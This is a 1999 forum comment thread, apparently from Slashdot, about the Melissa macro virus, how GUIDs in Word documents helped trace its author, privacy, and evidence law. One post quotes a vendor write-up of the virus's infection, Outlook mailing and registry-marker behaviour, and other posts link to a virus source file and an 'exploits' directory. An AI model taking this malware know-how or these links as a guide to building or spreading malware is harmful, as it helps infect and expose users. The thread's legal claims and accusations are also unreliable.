Spreading a virus now because of some bits of spam received two years ago? That sounds like a highly intensive grudge to me.
Based on what this guy is apparently able to code he's not your run-of-the-mill hacker. So why does he insist in working in that unstable platform?
D. Keith Higgs
CWRU. Kelvin Smith Library
My office has been taken over by iPod people.
Melissa preys upon MICROSOFT Outlook and maybe other MICROSOFT technologies and could easily have been made somewhat deadlier. Why would Microsoft publicise the risks of using its over elaborate technology?
Even though Phar Lap established that the MAC address is part of the GUID, you can't just take a MAC address and go find it on the Internet, at least not that I know of.
ZDNet must have had some other tip such as an IP address or an informant that led them to the source. If forced to wager, my money would be on "informant."
Also note that even though MS has changed the registration process, this still leaves the same GUID in your Word documents. It's just not sent to MS anymore.
>> it shows how they traced the GUID
Again, not to be picky, but it could not have been the GUID that led ZDNet to the original. Yes, it was used to compare MAC addresses, but there was certainly something else that helped them find the source.
Note, too, that the article said only that the MAC addresses matched. It did not say that the GUID's matched. I'd think it would be easier to forge the MAC address portion than the entire GUID.
Maybe it's just one hacker setting up another hacker, then blowing the whistle. Just speculatin'
Sorry for my loose use of the term "spec" and any resulting confusion. As I'm all too painfully aware, Word documents are not an open spec. But some info about them is published.
Anyway, the existence of the GUID is not a new discovery, while the existence of the embedded MAC address is.
Since it was the MAC address portion that was used to correlate the documents, I guess it is accurate to say that it came about as a result of Phar Lap's recent research.
It's still a sloppy article by ZDNet. I mean, how the *&%$ did they know where to look? What led them to that particular web site?
First, the existence of the GUID in Word documents was not "recently discovered." It's part of the spec, and it's been known about for a long time.
What was discovered is that the GUID is transmitted to MS during the registration process.
Of course, the likelihood that the macro writer registered his copy of Windows using his real name and address is probably.... zero. So it's doubtful that MS has any record that GUID.
Which begs the question... What is the basis for ZDNet's claim that the GUID was used to "track" the document back to its creator?
More likely, they used the NNTP headers to get some hints about where to look, and when THAT trail led somewhere, they compared GUID's and thus established an apparent connection.
The real issue is not the recently discovered transmission of the GUID to MS during registration, it's the existence of the GUID itself that can reveal more about information than you realize. It's not "big brother," it's just bad design. And sloppy reporting.
http://www.root.org/melissa_virus.txt- Mar-99/melissa.macro.virus.txt
... don't show anyone else ;-)
http://www.genocide2600.com/~tattooman/exploits
Subject:
Important Message From
Body:
Here is that document you asked for
a bit obvious, don't you think.
> Virus writers and crackers need to be given some serious jail time and fines.
Agreed. Virus writers are like people shouting fire in a crowded theatre. They probably don't intend to really hurt anyone, but they know they are "playing with fire," so to speak. So if their actions hurt others they should be held accountable.
That said, I'd rather let the virus writer get away with it than have every Office document carry a unique ID traceable to the author. Americans are too freely giving up their privacy. Time to fight back.
Questionable particularly in the light of the "most widespread PC virus attack ever."
Here at CNET the decision was suddenly made this week to unilaterally roll out Outlook to all employees (Eudora was standard until now). What could the advantage of that change possibly be? Eudora is relatively small, reliable, and featureful; Outlook is enormous and crash-prone.
Backroom deal with Microsoft?
I find it interesting that so many people assume that GUIDs were invented by Microsoft with evil intent, when in fact Microsoft was reusing an "open standard" for generating unique 128-bit identification numbers from RPC for DCE (Unix) -- with minor mods to handle the larger fraction of PCs w/o network cards. This decision was made over seven years ago for OLE2. This is also used by CORBA.
The reason a GUID is in a Word document is because Microsoft treats documents as objects (generally considered a good thing), and objects carry identifiers with are GUIDs. Most other distributed object systems do the same thing.
The main issue is that Microsoft distributed GUIDs more pervasively than most, since their software is so popular.
How do I know this? I made this design decision for using GUIDs.
Are the GNOME guys thinking about this? Don't they use CORBA? Sometimes it's easy to take your infrastructure for granted -- like I imagine the Word guys did when they used COM/OLE, and ended up with this GUID/privacy problem.
[Straight after the discovery of the ID's Microsoft promised us that they'd erase the databases immediately. If they're able to use these id's it means that they haven't erased the bases. They lied AGAIN....]
Take a valium and stick to watching the X-Files. They did not track this with the Microsoft registration database -- it was done more simply by comparing the GUIDs in documents.
Geez.
hence surf with Linux... what .exe viruses can do to us :-) macroviruses likewise.
God did not appoint us to suffer wrath but to receive salvation through our Lord Jesus Christ --1Thes5:9
-segfault
Go ahead and let them install outlook and then ignore it and use whatever imap reader you want - I use netscape and what IS dosn't know won't hurt them.
The whole macro virus shows the bad things that can happen when one company is able to have its software running at all the levels - if you take the MS out of any part the whole things breaks. I believe the Cliff Stoll made a comment relating to this about not letting any one vendor dominate as a security flaw in that vendor's product could compromise everyone.
I hope companies (like mine) that now have their email turned off re-think how great exchange, word, and the whole MS package is. I wonder what this is costing in terms of lost work etc?
As for the question posed in the subject, I was under the impression that a virus ran on one single machine and that was the end of it's story. Someone had to physically put it onto your machine for it to get there and when it was done with you, that particular program was finished.
;-)
- --
... don't show anyoneelse ;-)"
... it's a new age!
With a worm, however, the program doesn't "want" to "die" on your machine. It has the ability to transfer between machines that are connected through some sort of networking protocol.
So, in the case of Melissa, I would think that it SHOULD be called a worm for the simple fact that it transfers itself through email (TCP/IP). My only doubt lies in the fact that Central Command has also labled it a virus.
Someone said they didn't even know what Melissa does, so below is an copy of what Central Command posted to their web site recently. BTW, if what Central Command says about Melissa is true, I can find out whether I'm infected with Melissa by using regedit.exe and Ctrl+F
-----------------------------------------------
This macro virus replicates under Word 8 and Word 9 (Office97 and Office2000), infects Word document and templates, and sends its copies in Email messages. The virus has trigger routine, changes the system registry, disables Word macro-virus protection.
The virus is able to spread to Office2000 (Word ver.9) documents. This possibility is based on Office "convertation" feature. When new Office version opens and loads documents and templates created by previous Word versions, it converts data in documents to new formats. The macro program in files are also converted, including virus macros. As a result the virus is able to replicate itself under Office2000.
In case the virus is run in Office2000 it performs additional action: it disables (sets to minimal level) Office2000 security settings (anti-virus protection).
The virus code contains one module named "Melissa" with one auto-function in it: "Document_Open" in infected documents, or "Document_Close" in NORMAL.DOT (global macros area). The virus infects the global macros area on an infected document opening, and spreads to other documents on their closing. To infect documents and templates the virus copies its code line-by-line from infected object to victim one. In case the NORMAL.DOT is being infected, the virus names its program in module as
"Document_Close", when the virus copies its code from NORMAL.DOT to a document, the virus names it "Document_Open". As a result the virus installs itself into the Word application at the same time infected document is opened, and affects other documents only when they are closed.
To send its copies in email messages the virus uses VisualBasic abilities to activate other Microsoft applications and use their routines: the virus gets access to MS Outlook and calls its functions. The virus gets the addresses from Outlook database and sends to all of them a new message. This massage has: The subject: "Important Message From [UserName]" (UserName is variable) Message body: "Here is that document you asked for
The message also has attached document (needless to say that it is infected) - the virus attaches the document that is being edited now (active document). As a side effect of this way of spreading the user's documents (including confidential ones) can be sent out to the Internet. The virus sends infected emails only one time. Before sending the virus checks system registry for its ID stamp:
HKEY_CURRENT_USER\Software\Microsoft\Office\ "Melissa?" = "... by Kwyjibo"
If this entry does not exist, the virus sends e-mails from infected computer, and then creates this entry in the registry. Otherwise the virus jumps over the email routine. As a result the virus sends infected email messages only once: on next attempts it locates the "Melissa?=" entry, and skips it.
The virus also have trigger routine that is activated if current day number is equal to current minutes, each time virus macros get control. This routine inserts the text into the current document:
Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here.
The virus has the comments:
WORD/Melissa written by Kwyjibo
Works in both Word 2000 and Word 97
Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
Word -> Email | Word 97 Word 2000
"No one will ever use more then 640k of memory." -Bill Gates 1981
was this before or after they assasinated JFK?
+&x
hear hear!
+&x
*Unnnnhh* -- Virus in Visual Basic -- *choke* *wheeze* -- Documents with executable code embedded in them -- *gasp* -- Unique identifiers embedded in documents -- *groan* -- Bad, bad ideas -- *pant* -- Can't breathe anymore -- getting dark....
Save the whales. Feed the hungry. Free the mallocs.
Great point. What's subtle, but very scary, is the use of the word "fingerprint" in the media to describe the GUID.
This creates the impression in the mind of the public that a GUID is unique like a fingerprint. Programmers who work on Microsoft systems know that GUIDs can be easily copied or faked.
I would hate for someone to snag a GUID from a COM object I wrote and embed it a Word doc containing a virus. Convincing the FBI that it wasn't me could be a nightmare.
Geez, the more I think about this, the more it scares me!
Save the whales. Feed the hungry. Free the mallocs.
It's a psuedo-random number based partly on the unique number in the network card. I'm pretty sure the exact date/time of generation plays a part it in, as well.
:-)
Scary point -- There is an acknowledged Microsoft bug that occurs when GUIDs are generated on computers without Ethernet cards. These computers use Dial-Up Networking, which apparently generates the SAME unique identifier for everyone. It is possible that two computers without Ethernet cards could generate the same GUID.
Yeah, I sometimes program in Windows. I didn't say I like it.
Save the whales. Feed the hungry. Free the mallocs.
.. although the guy apparently has a history of
spreading virii, there is no proof that it was him..
because of the publicity regarding the UID's, anyone
smart enough to engineer this type of thing would
be smart enough to be able to cover their tracks..
The ZDNet artice claims that the MAC address is 'proof',
but any semi-literate coder would know that it's pretty
simple to change a MAC address (software settable..)
All they have is circumstantial evidence, so anyone who's
foolish enough to say "see the UIDS are good" is going to
be proven to look the fool when he's aquitted.
If the authorities push this, I hope the guy brings
a huge civil lawsuit against MS for invasion of privacy.
Doesn't matter - the info obtained in this situation was not obtained by either a 'search' or by someone acting as a law enforcement agent.
Remember, Kenneth Starr couldn't tape record Monica Lewinsky's phone conversations w/o her consent or a warrant, but Linda Tripp could as she is a private citizen and not subjected to the same restrictions as law enforcement.
Not to mention that a search, or a phone tap, implies a breach of someone's assumed private communications - you have a reason to believe that things you say privately over your phone line, or in a letter, remain private. Anything you publically state (or post) does not carry any kind of reasonable expectation of privacy.
Laws regarding recording phone conversations vary from state to state. In some states what Tripp did was perfectly legal ... in others, completely illegal and
inadmissible by Starr. I guess he was lucky it was in DC. *grin*
Actually, what Tripp did (taping of a 2nd party w/o their consent) is illegal (AFAIK) under the law of DC (or wherever it actually happened) though she was not charged with any crime for this
That does not, however, make the evidence inadmissible as it was the finding of a private citizen. As long as you are not dealing with stolen evidence (or certain confidential or priveleged types of documents) and are not a judicial or quasi-juidicial power, improperly obtained evidence is not inadmissible
If I break into your house and find a body in the basement I can call the police. I might go down for B&E or trespass, but that body is sending you to jail for a long time - it doesn't matter if I wasn't supposed to find it.
Information obtained by
a 3rd party without the defendants knowledge is very shaky ground in court, especially when it's a commercial 3rd party as Microsoft is.
Again, thats not true at all. It doesnt matter whether the third party is a private citizen or a private corporation, as long as they do not wield judicial authority. You want proof? Look at US v Alvarez-Machain (112 S.Ct 2188 (1992)) or Ker v Illinois (119 US 443, 7 S.Ct 229) - rules of search and seizure only apply to those acting in official judicial capacity
So yes, you could log my keystrokes, or film me doing illegal things through the window of my house, or even listen in on my phone conversations as long as you are not a cop
I find it very hard to swallow however, that evidence gained from illegal activity is admissible in court in all instances. If this were the standing precedence, why
wouldn't the cops simply get non-cops to break into people's houses to search when they can't get a warrant? Why wouldn't they get non-cops to plant bugs and
cameras in crack houses to get evidence?
Because in that case the non-cops would be acting on behalf of a judicial power and would be subject to the same rules as the cops (they would be a quasi-judicial power in a way). You have to be acting independantly of the government to be exempt from search warrants and the like.
This may explain
why if you found a body in my basement during a B&E, I would get charged but if you went in and planted a camera for the specific purpose to taping what I do in
my own house and that tape caught the killing, that would not be admissible. (However, I'm sure it would be enough to get me arrested and the body found
subsequent would be enough to convict me. *grin* There is a big difference between evidence required to arrest/detain and evidence required to convict.)
Actually, I think the tape would be admissible, though if it weren't, you wouldn't get convicted. Huh? Well, if the tape gets you arrested, the arrest leads to the body, and the tape is found to be illegally obtained, then any evidence springing from that is also tainted. So if the tape is bad, anything found because of it is inadmissible
And for the MAC address? It's transmitted and not protected by any kind of expectation of privacy - once you broadcast it, knowingly or not, you pretty much lose any expectation of privacy. If I send out any email and am not aware of everything included in it, I can't then turn around and expect people to not read certain parts, they are there.
They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. Historical Review of Pennsylvania [1759] -- njl
So they've traced the author of the document by the ID numbers. This information CAN be forged, you know. There is a reason we don't allow random wiretaps in the US, beyond the whole privacy issue. Its because the simple discussion of a crime or thought of a crime is not in and of itself a crime, and therefore that can't be used against someone unless such a crime is committed.
.exe files, or attachments of any form you're not familiar with (as they can be exe files in disguise)
However, if a crime IS committed, and such wiretaps were in place, any person who had recently mentioned something even remotely similar in innoncent conversation while tapped would be instantly suspect, and with such a "likely prospect" prosecution would focus on that individual and neglect other leads which would be more realistic.
However, if wiretaps are common practice, a clever criminal will find a way to bypass them, or use them to broadcast false information, and end up implicating innocents of crimes they commit. Remember, the reason that wiretaps are effective now is that on the rare event that they are used, under court order, the suspect does not expect them and in many cases won't be prepared.
However, in the case of a court ordered wiretap, the police and/or prosecution already must have some probable cause to believe that the suspect is involved in a crime and that a wiretap would be beneficial to further evidence. Although this theory is pretty easy to get around, the police can get into serious civil trouble if too many "false alarms" are presented.
You occassionally hear about a search/seisure that went wrong. The wrong house was raided, torn apart and nothing was found which presents evidence of a crime. The victims of this false raid have rights to legal compensation for the intrusion. This simply won't happen too often under today's guidelines.
So if we come along and say that ID's are OK because we can trace criminals, we've gotten into the habit of invading the privacy of the innocent to weed out the guilty, even when no crime has taken place. If this can be attributed to a an
"illegal wiretap", then the evidence which lead to the aol account and all evidence which followed up as a result of that could get thrown out of court by a clever lawyer.
The real solution isn't really tracking down the virus writers anyway. Virus will always be with us. There is ZERO way to eliminate them completely, or to completely prevent new ones from being developed. Besides, it is remarkably simple to prevent getting infected, even if you don't have a virus scanner. It all comes down to a matter of trust.
Almost all of this stuff starts because some idiot, and yes, I mean IDIOT downloads a virus from some complete stranger, and is compelled to spread this virus to all his friends. This is the same fool who time and again will forward hoaxes to everyone he knows just because since it came over the internet it MUST be for real. For this problem there are two solutions. Either discover the the problem trait and eliminate it from the gene pool, or determine which people you know are reliable and don't ever accept attachments from anyone else.
Don't send word documents in email. I get so annoyed when people send me a 4 meg word document which has 10k worth of text in it. Do you think I'm going to waste my time reading it? I don't even have an installed copy of word, so its hardly important to me. Anyone who automatically assumes I will have office9? installed is not someone I wish to do business with. Forget the fact that half the time I don't even know what format the document is in, and don't think I'm going to spend any amount of time figuring it out.
The only attachments I will ever look at are images. THATS IT. I consider email a method of transfering text. That's INFORMATION in a form I can easily desseminate and text is the lowest common denominator in size and has the highest compression rate. If I absolutely NEED to see some huge picture, just give me a link to it and I'll make the decision to waste the bandwidth on it.
I have made a policy of reacting violently (in a verbal way) to anyone who sends me trash like this. I make it very clear, in no uncertain terms, that if they send me such information again I will prevent them from sending me ANYTHING again. Its amazing how able people are to distingush between hoaxes and legitimate information once you've made it clear what you don't want. Why is it then that they send it to you in the first place?
Ok.. Here's my list of things to avoid. If you get it, delete it.
- ALL spam, spam of all colors, it tastes just as bad. Don't reply from a legit mail account to complain, just delete it and forget about it.
- ANY attachments other than very small pictures. Most email readers will decode pictures and display them automatically, while it will display a link for other attachments. Don't accept word documents,
- Don't accept programs from ANYONE over icq or IRC. It doesn't matter WHAT it is or WHO sent it to you. Even if they're not trying to screw you over, you have no idea where they got it from or what might have infected their system previously and therefore the file they're sending you. Even if they're your best friend, you really don't know for sure. Ask them where they got the file from and download it from that source yourself. If they received it from someone else and don't know the source, then its automatically suspect already.
Don't let anyone use your computer for ANY reason, with the exception of the system administrator if you're in a work environment. People who bring over a floppy disk, insert it in your computer and bring up a program or any other file could be infecting your computer. We have networks these days guys, you don't need to transfer files around on floppies anymore. Also, people who use your computer for chatting can also download and run programs, no matter how much effort you put into avoiding it.
Avoid microsoft products. They're the greatest threat to the security of any environment. If you must use them, consider them to be insecure. Don't trust them for any tasks which must be fail-safe, and assume you'll have to reboot often and reload occasionally.
Backup early, backup often, and keep your backups safe.
-Restil
restil@alignment.net
Play with my webcams and lights here
All you have to do is realize that Outlook sucks hardcore anyways, As for me, I'll stick with Eudora. This does raise an interesting point that MS will undoubtedly tout as a reason for it's ID's to be kept up. Never mind that it was it's shoddy software that allows this to happen, but hell. Spin control...
Zen
-Zen I'm gonna make the _world_ my bitch.
Microsoft = Big Brother
-- First post (by a female living in a state that begins with M and does not end in a vowel with a birthday that falls
There appear to be many other viruses written by the person(s) responsible for Melissa, including an Excel version. See the list here:
http://users.skynet.be/somnus/virshop.html
It could have been a non-macro (traditional) virus that used OLE to do it's work. This possibly opens up other email programs that can be accessed through OLE as well.
:-P
Will we never cease to reap the benefits from Microsoft innovation
-Jennifer
Just doing a quick search on dejanews, I found about 50 posts by skyroket@aol.com...but they were all from 1997, and all on sex newsgroups. It looks like he was a spammer. Most likely the virus' author was a regular on one of those newsgroups and has an aversion towards spammers (who doesn't?) I'd be willing to bet money the skyroket@aol.com address was faked for the posting (need a scapegoat? Use a spammer :)
FYI, I have personally witnessed multiple instances of duplicate GUIDs.
By your description, any two dialup users who install at the same time will have identical GUIDs. The severity of this effect depends on granularity of the timestamp used.
While dial-up does not play any role in GUID computation, the absence of an Ethernet card does. My guess is that most AOL users have no Ethernet card installed in their computer.
I know of a company that uses GUIDs in their client software--it is recorded, by default, in their server transaction logs. I also believe that some companies may use it for client-based authentication.
The ZDNet story reports that the GUID has traced back to an AOL user--however most users on AOL access the Internet via modems, and have no Ethernet card! (It suprises me that this caveat is not mentioned in the ZDNet article.) The GUID is likely identical to many other dial-up users.
Also, since GUIDs are based on MAC address, GUIDs are tied to a specific computer (or more correctly, a specific Ethernet card)--not a specific user. This creates an interesting twist in a computer lab environment.
And even then, MAC addresses can be faked. Or, if the GUID is stored in (I'm guessing) the Windows Registry, it's even easier to change.
For these reasons, GUIDs are meaningless. It is a poorly designed user tracking mechanism that doesn't work. The only reason one should fear GUIDs is that they may be used as evidence which may lead to false prosecution by the ignorant.
---BTW, the GUID is not Microsoft application specific. GUIDs are available as part of Microsoft's API's, and are used in many non-Microsoft applications. Look around a little and you'll see.
The Zimmerman Telegram was legitimate, but even people who wanted to enter the war on the side of the British were congratulating British officials on a splendid forgery.
Then the German government publically acknowledged that they had sent the telegram. Barbara W. Tuchman wrote a superb book on the subject, which I highly recommend.
ObTopic: The Zimmerman Telegram used code group cryptography which the Germans were convinced was totally secure.
--Dave
It's hard to leave MS out of this since it only infects their products. It's even named after Gates' WIFE!
You got it right that a virus attaches itself to a program and a worm etc.. etc... But even though Melissa is a script it is a script that attaches itself to the documents to propegate. At least this is from what I know so correct me if I'm wrong.
E29
Hey, although I am against micro$oft BIG TIME as far as I see this is surely something they have done right? Someone makes a virus/worm that is a macro and e-mails it. The fact that micro$oft can trace them is a good thing, right? That's the way I see it anyway. But maybe it isn't? Whatever happens it doesn't affect me because I use Linux.
Who the hell cares? If this issue was so important, you would have heard about it from somewhere else rather than Slashdot. This Melissa virus affects windows users, one of which Rob isn't, so he shouldn't have to post stories to tell all you morons not to read file attachments from strangers. Slashdot is run by Rob Malda (and a few others), so let him censor what he wants. If you don't like it, go read the "uncensored" crap at wired.com or news.com.
Paranoi Aside, because that's the first thing I thought of (amazing how many people saw the potential conspiracy theory huh? :-)) isn't this just more lies from MS?
Straight after the discovery of the ID's Microsoft promised us that they'd erase the databases immediately. If they're able to use these id's it means that they haven't erased the bases. They lied AGAIN....
It's worth adding that MS has in the past discussed plans for bogus public relations campaigns. Now they're backed into a corner, it's totally reasonable that they'd want to justify the GUID in the public arena before it bites them in the ass in court. MS aren't dumb people, just hopelessly out of touch, reminds me of Apple a few years ago.
So let me get this straight...
MS makes a product full of exploits to give you headaches.
MS makes a product that invades your privacy and allows you to be tracked.
But you take those two wrongs and make a right by being able to track the exploiter? This is just ludicrous... here's a slogan to go with that "Our maliciousness protects you from our lack of quality!"
That's like when someone breaks into your house, but doesn't find the truly valuable stuff because it's such a mess... Oh wait... that's the MS security model - security through obscurity.
-
BlackNova Traders
This is believable, but don't you think that someone at Microsoft would have found the ID rather than someone working for another company, and a PhD Student?